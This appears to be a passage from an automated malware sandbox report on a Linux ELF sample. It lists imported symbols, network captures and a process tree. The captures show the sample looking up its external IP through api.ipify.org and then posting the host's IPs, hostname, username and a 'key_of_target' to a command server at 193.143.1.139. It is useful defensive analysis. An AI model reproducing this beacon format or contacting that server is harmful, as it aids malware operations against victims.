                                memcpy |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                memmove |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                memset |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                mkdtemp |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                nanosleep |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                open |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                open64 |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                opendir |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                poll |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pow |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                printf |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_cond_broadcast |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_cond_destroy |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_cond_init |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_cond_signal |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_cond_wait |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_create |  |  | .dynsym | 0x404430 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_detach |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_getspecific |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_join |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_key_create |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_key_delete |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_mutex_destroy |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_mutex_init |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_mutex_lock |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_mutex_unlock |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_once |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                pthread_setspecific |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                putc |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                puts |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                putwc |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                read |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                readdir |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                readdir64 |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                readlink |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                realloc |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                recv |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                remove |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                rename |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                send |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                setlocale |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                setmntent |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                setvbuf |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                sleep |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                socket |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                sprintf |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                statvfs64 |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                stderr |  |  | .dynsym | 0x5b87c0 | 8 | OBJECT | <unknown> | DEFAULT | 27
                                stdin |  |  | .dynsym | 0x0 | 0 | OBJECT | <unknown> | DEFAULT | SHN_UNDEF
                                stdout |  |  | .dynsym | 0x0 | 0 | OBJECT | <unknown> | DEFAULT | SHN_UNDEF
                                strcasecmp |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                strchr |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                strcmp |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                strdup |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                strerror |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                strlen |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                strncmp |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                strncpy |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                strstr |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                strtol |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                strtold_l |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                strtoul |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                syscall |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                sysconf |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                time |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                tolower |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                towlower |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                umount |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                uname |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                ungetc |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                ungetwc |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                unlink |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                vsnprintf |  |  | .dynsym | 0x404730 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                wcrtomb |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                wcscmp |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                wcslen |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                wcsnrtombs |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                wctob |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                wmemchr |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                wmemcmp |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                wmemcpy |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                wmemmove |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                wmemset |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                write |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                writev |  |  | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Nov 4, 2024 15:17:52.365741968 CET | 44684 | 80 | 192.168.2.23 | 172.67.74.152
                                Nov 4, 2024 15:17:52.370946884 CET | 80 | 44684 | 172.67.74.152 | 192.168.2.23
                                Nov 4, 2024 15:17:52.370999098 CET | 44684 | 80 | 192.168.2.23 | 172.67.74.152
                                Nov 4, 2024 15:17:52.373203039 CET | 44684 | 80 | 192.168.2.23 | 172.67.74.152
                                Nov 4, 2024 15:17:52.378259897 CET | 80 | 44684 | 172.67.74.152 | 192.168.2.23
                                Nov 4, 2024 15:17:53.028275967 CET | 80 | 44684 | 172.67.74.152 | 192.168.2.23
                                Nov 4, 2024 15:17:53.028337955 CET | 44684 | 80 | 192.168.2.23 | 172.67.74.152
                                Nov 4, 2024 15:17:53.030632019 CET | 44684 | 80 | 192.168.2.23 | 172.67.74.152
                                Nov 4, 2024 15:17:53.043339014 CET | 80 | 44684 | 172.67.74.152 | 192.168.2.23
                                Nov 4, 2024 15:17:53.043384075 CET | 44684 | 80 | 192.168.2.23 | 172.67.74.152
                                Nov 4, 2024 15:17:53.045563936 CET | 37928 | 80 | 192.168.2.23 | 193.143.1.139
                                Nov 4, 2024 15:17:53.051029921 CET | 80 | 37928 | 193.143.1.139 | 192.168.2.23
                                Nov 4, 2024 15:17:53.051074982 CET | 37928 | 80 | 192.168.2.23 | 193.143.1.139
                                Nov 4, 2024 15:17:53.054349899 CET | 37928 | 80 | 192.168.2.23 | 193.143.1.139
                                Nov 4, 2024 15:17:53.059658051 CET | 80 | 37928 | 193.143.1.139 | 192.168.2.23
                                Nov 4, 2024 15:17:53.059678078 CET | 80 | 37928 | 193.143.1.139 | 192.168.2.23
                                Nov 4, 2024 15:17:53.294070959 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42
                                Nov 4, 2024 15:17:54.154350996 CET | 80 | 37928 | 193.143.1.139 | 192.168.2.23
                                Nov 4, 2024 15:17:54.154402018 CET | 37928 | 80 | 192.168.2.23 | 193.143.1.139
                                Nov 4, 2024 15:17:54.156864882 CET | 37928 | 80 | 192.168.2.23 | 193.143.1.139
                                Nov 4, 2024 15:17:54.163044930 CET | 80 | 37928 | 193.143.1.139 | 192.168.2.23
                                Nov 4, 2024 15:17:54.163100958 CET | 37928 | 80 | 192.168.2.23 | 193.143.1.139
                                Nov 4, 2024 15:17:58.669320107 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43
                                Nov 4, 2024 15:18:00.205085039 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202
                                Nov 4, 2024 15:18:14.539160967 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42
                                Nov 4, 2024 15:18:24.777761936 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43
                                Nov 4, 2024 15:18:30.920933962 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202
                                Nov 4, 2024 15:18:55.493491888 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42
                                Nov 4, 2024 15:19:15.970681906 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Nov 4, 2024 15:17:52.355514050 CET | 37932 | 53 | 192.168.2.23 | 1.1.1.1
                                Nov 4, 2024 15:17:52.364382029 CET | 53 | 37932 | 1.1.1.1 | 192.168.2.23
                                Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                Nov 4, 2024 15:18:01.258605957 CET | 192.168.2.23 | 192.168.2.1 | 8283 | (Port unreachable) | Destination Unreachable
                                Nov 4, 2024 15:19:21.275962114 CET | 192.168.2.23 | 192.168.2.1 | 8283 | (Port unreachable) | Destination Unreachable
                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                Nov 4, 2024 15:17:52.355514050 CET | 192.168.2.23 | 1.1.1.1 | 0x62df | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                Nov 4, 2024 15:17:52.364382029 CET | 1.1.1.1 | 192.168.2.23 | 0x62df | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                Nov 4, 2024 15:17:52.364382029 CET | 1.1.1.1 | 192.168.2.23 | 0x62df | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                Nov 4, 2024 15:17:52.364382029 CET | 1.1.1.1 | 192.168.2.23 | 0x62df | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                • api.ipify.org
                                • 193.143.1.139
                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                0 | 192.168.2.23 | 44684 | 172.67.74.152 | 80
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 4, 2024 15:17:52.373203039 CET | 145 | OUT | GET / HTTP/1.1
                                Host: api.ipify.org
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
                                Nov 4, 2024 15:17:53.028275967 CET | 446 | IN | HTTP/1.1 200 OK
                                Date: Mon, 04 Nov 2024 14:17:52 GMT
                                Content-Type: text/plain
                                Content-Length: 14
                                Connection: keep-alive
                                Vary: Origin
                                cf-cache-status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 8dd53ae9ae59485c-DFW
                                alt-svc: h2=":443"; ma=60
                                server-timing: cfL4;desc="?proto=TCP&rtt=1553&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=133&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
                                Data Ascii: 173.254.250.69


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                1 | 192.168.2.23 | 37928 | 193.143.1.139 | 80
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 4, 2024 15:17:53.054349899 CET | 2259 | OUT | POST /Ujdu8jjooue/biweax.php HTTP/1.1
                                Host: 193.143.1.139
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
                                Content-Length: 1977
                                Accept: */*
                                Content-Type: multipart/form-data; boundary=------------------------3yO5v8qEW
                                Data Ascii:
                                --------------------------3yO5v8qEW
                                Content-Disposition: form-data; name="version"

                                1.0
                                --------------------------3yO5v8qEW
                                Content-Disposition: form-data; name="https_protocol"

                                NO
                                --------------------------3yO5v8qEW
                                Content-Disposition: form-data; name="hash"

                                EA4EC50098D5E3A5284363606137C38100C9D4D907FB82C1C84A806588D1C977
                                --------------------------3yO5v8qEW
                                Content-Disposition: form-data; name="key_of_target"

                                C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
                                --------------------------3yO5v8qEW
                                Content-Disposition: form-data; name="external_IP"

                                173.254.250.69
                                --------------------------3yO5v8qEW
                                Content-Disposition: form-data; name="internal_IP"

                                127.0.0.1,192.168.2.23,::1,fe80::250:56ff:fe98:912c%ens160
                                --------------------------3yO5v8qEW
                                Content-Disposition: form-data; name="hostname"

                                galassia
                                --------------------------3yO5v8qEW
                                Content-Disposition: form-data; name="username"

                                saturnino
                                --------------------------3yO5v8qEW
                                Content-Disposition: [TRUNCATED]
                                Timestamp: Nov 4, 2024 15:17:54.154350996 CET
                                Bytes transferred: 256
                                Direction: IN
                                Data:
                                HTTP/1.1 200 OK
                                Server: nginx/1.26.2
                                Date: Mon, 04 Nov 2024 14:17:54 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                X-Powered-By: PHP/8.1.2-1ubuntu2.19
                                Vary: Accept-Encoding
                                Data Raw: 34 0d 0a 47 6f 6f 64 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 4Good0


                                System Behavior

                                Start time (UTC):14:17:51
                                Start date (UTC):04/11/2024
                                Path:/tmp/Zc9eO57fgF.elf
                                Arguments:/tmp/Zc9eO57fgF.elf
                                File size:1802024 bytes
                                MD5 hash:503c35c37d00d04ff2793c2b4bf5038f

                                Start time (UTC):14:17:51
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/systemd/systemd
                                Arguments:-
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                Start time (UTC):14:17:51
                                Start date (UTC):04/11/2024
                                Path:/lib/systemd/systemd-logind
                                Arguments:/lib/systemd/systemd-logind
                                File size:268576 bytes
                                MD5 hash:8dd58a1b4c12f7a1d5fe3ce18b2aaeef

                                Start time (UTC):14:17:53
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/systemd/systemd
                                Arguments:-
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                Start time (UTC):14:17:53
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/accountsservice/accounts-daemon
                                Arguments:/usr/lib/accountsservice/accounts-daemon
                                File size:203192 bytes
                                MD5 hash:01a899e3fb5e7e434bea1290255a1f30

                                Start time (UTC):14:17:55
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/accountsservice/accounts-daemon
                                Arguments:-
                                File size:203192 bytes
                                MD5 hash:01a899e3fb5e7e434bea1290255a1f30

                                Start time (UTC):14:17:55
                                Start date (UTC):04/11/2024
                                Path:/usr/share/language-tools/language-validate
                                Arguments:/usr/share/language-tools/language-validate en_US.UTF-8
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):14:17:55
                                Start date (UTC):04/11/2024
                                Path:/usr/share/language-tools/language-validate
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):14:17:55
                                Start date (UTC):04/11/2024
                                Path:/usr/share/language-tools/language-options
                                Arguments:/usr/share/language-tools/language-options
                                File size:3478464 bytes
                                MD5 hash:16a21f464119ea7fad1d3660de963637

                                Start time (UTC):14:17:55
                                Start date (UTC):04/11/2024
                                Path:/usr/share/language-tools/language-options
                                Arguments:-
                                File size:3478464 bytes
                                MD5 hash:16a21f464119ea7fad1d3660de963637

                                Start time (UTC):14:17:55
                                Start date (UTC):04/11/2024
                                Path:/bin/sh
                                Arguments:sh -c "locale -a | grep -F .utf8 "
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):14:17:56
                                Start date (UTC):04/11/2024
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):14:17:56
                                Start date (UTC):04/11/2024
                                Path:/usr/bin/locale
                                Arguments:locale -a
                                File size:58944 bytes
                                MD5 hash:c72a78792469db86d91369c9057f20d2

                                Start time (UTC):14:17:56
                                Start date (UTC):04/11/2024
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):14:17:56
                                Start date (UTC):04/11/2024
                                Path:/usr/bin/grep
                                Arguments:grep -F .utf8
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                Start time (UTC):14:17:53
                                Start date (UTC):04/11/2024
                                Path:/usr/bin/xfce4-session
                                Arguments:-
                                File size:264752 bytes
                                MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                Start time (UTC):14:17:54
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/systemd/systemd
                                Arguments:-
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                Start time (UTC):14:17:54
                                Start date (UTC):04/11/2024
                                Path:/usr/bin/pulseaudio
                                Arguments:/usr/bin/pulseaudio --daemonize=no --log-target=journal
                                File size:100832 bytes
                                MD5 hash:0c3b4c789d8ffb12b25507f27e14c186

                                Start time (UTC):14:17:54
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/gdm3/gdm-session-worker
                                Arguments:-
                                File size:293360 bytes
                                MD5 hash:692243754bd9f38fe9bd7e230b5c060a

                                Start time (UTC):14:17:54
                                Start date (UTC):04/11/2024
                                Path:/etc/gdm3/PostSession/Default
                                Arguments:/etc/gdm3/PostSession/Default
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):14:18:00
                                Start date (UTC):04/11/2024
                                Path:/usr/sbin/gdm3
                                Arguments:-
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                Start time (UTC):14:18:00
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/gdm3/gdm-session-worker
                                Arguments:"gdm-session-worker [pam/gdm-launch-environment]"
                                File size:293360 bytes
                                MD5 hash:692243754bd9f38fe9bd7e230b5c060a

                                Start time (UTC):14:18:03
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/gdm3/gdm-session-worker
                                Arguments:-
                                File size:293360 bytes
                                MD5 hash:692243754bd9f38fe9bd7e230b5c060a

                                Start time (UTC):14:18:03
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/gdm3/gdm-x-session
                                Arguments:/usr/lib/gdm3/gdm-x-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
                                File size:96944 bytes
                                MD5 hash:498a824333f1c1ec7767f4612d1887cc

                                Start time (UTC):14:18:03
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/gdm3/gdm-x-session
                                Arguments:-
                                File size:96944 bytes
                                MD5 hash:498a824333f1c1ec7767f4612d1887cc

                                Start time (UTC):14:18:03
                                Start date (UTC):04/11/2024
                                Path:/usr/bin/Xorg
                                Arguments:/usr/bin/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):14:18:03
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/xorg/Xorg.wrap
                                Arguments:/usr/lib/xorg/Xorg.wrap vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
                                File size:14488 bytes
                                MD5 hash:48993830888200ecf19dd7def0884dfd

                                Start time (UTC):14:18:03
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/xorg/Xorg
                                Arguments:/usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
                                File size:2448840 bytes
                                MD5 hash:730cf4c45a7ee8bea88abf165463b7f8

                                Start time (UTC):14:18:14
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/xorg/Xorg
                                Arguments:-
                                File size:2448840 bytes
                                MD5 hash:730cf4c45a7ee8bea88abf165463b7f8

                                Start time (UTC):14:18:14
                                Start date (UTC):04/11/2024
                                Path:/bin/sh
                                Arguments:sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):14:18:14
                                Start date (UTC):04/11/2024
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):14:18:14
                                Start date (UTC):04/11/2024
                                Path:/usr/bin/xkbcomp
                                Arguments:/usr/bin/xkbcomp -w 1 -R/usr/share/X11/xkb -xkm - -em1 "The XKEYBOARD keymap compiler (xkbcomp) reports:" -emp "> " -eml "Errors from xkbcomp are not fatal to the X server" /tmp/server-0.xkm
                                File size:217184 bytes
                                MD5 hash:c5f953aec4c00d2a1cc27acb75d62c9b

                                Start time (UTC):14:18:19
                                Start date (UTC):04/11/2024
                                Path:/usr/lib/gdm3/gdm-x-session
                                Arguments:-
                                File size:96944 bytes
                                MD5 hash:498a824333f1c1ec7767f4612d1887cc

                                Start time (UTC):14:18:19
                                Start date (UTC):04/11/2024
                                Path:/usr/bin/dbus-daemon
                                Arguments:dbus-daemon --print-address 4 --session
                                File size:249032 bytes
                                MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

                                Start time (UTC):14:18:20
                                Start date (UTC):04/11/2024
                                Path:/usr/bin/dbus-daemon
                                Arguments:-
                                File size:249032 bytes
                                MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

                                Start time (UTC):14:18:20
                                Start date (UTC):04/11/2024
                                Path:/usr/bin/dbus-daemon
                                Arguments:-
                                File size:249032 bytes
                                MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

                                Start time (UTC):14:18:20
                                Start date (UTC):04/11/2024
                                Path:/bin/false
                                Arguments:/bin/false
                                File size:39256 bytes
                                MD5 hash:3177546c74e4f0062909eae43d948bfc

                                Start time (UTC):14:18:00
                                Start date (UTC):04/11/2024
                                Path:/usr/sbin/gdm3
                                Arguments:-
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                Start time (UTC):14:18:00
                                Start date (UTC):04/11/2024
                                Path:/etc/gdm3/PrimeOff/Default
                                Arguments:/etc/gdm3/PrimeOff/Default
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):14:18:00
                                Start date (UTC):04/11/2024
                                Path:/usr/sbin/gdm3
                                Arguments:-
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                Start time (UTC):14:18:00
                                Start date (UTC):04/11/2024
                                Path:/etc/gdm3/PrimeOff/Default
                                Arguments:/etc/gdm3/PrimeOff/Default
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):14:18:00
                                Start date (UTC):04/11/2024
                                Path:/usr/sbin/gdm3
                                Arguments:-
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                Start time (UTC):14:18:00
                                Start date (UTC):04/11/2024
                                Path:/etc/gdm3/PrimeOff/Default
                                Arguments:/etc/gdm3/PrimeOff/Default
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):14:18:20
                                Start date (UTC):04/11/2024
                                Path:/usr/sbin/gdm3
                                Arguments:-
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                Start time (UTC):14:18:20
                                Start date (UTC):04/11/2024
                                Path:/etc/gdm3/PrimeOff/Default
                                Arguments:/etc/gdm3/PrimeOff/Default
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):14:18:21
                                Start date (UTC):04/11/2024
                                Path:/usr/sbin/gdm3
                                Arguments:-
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                Start time (UTC):14:18:21
                                Start date (UTC):04/11/2024
                                Path:/etc/gdm3/PrimeOff/Default
                                Arguments:/etc/gdm3/PrimeOff/Default
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c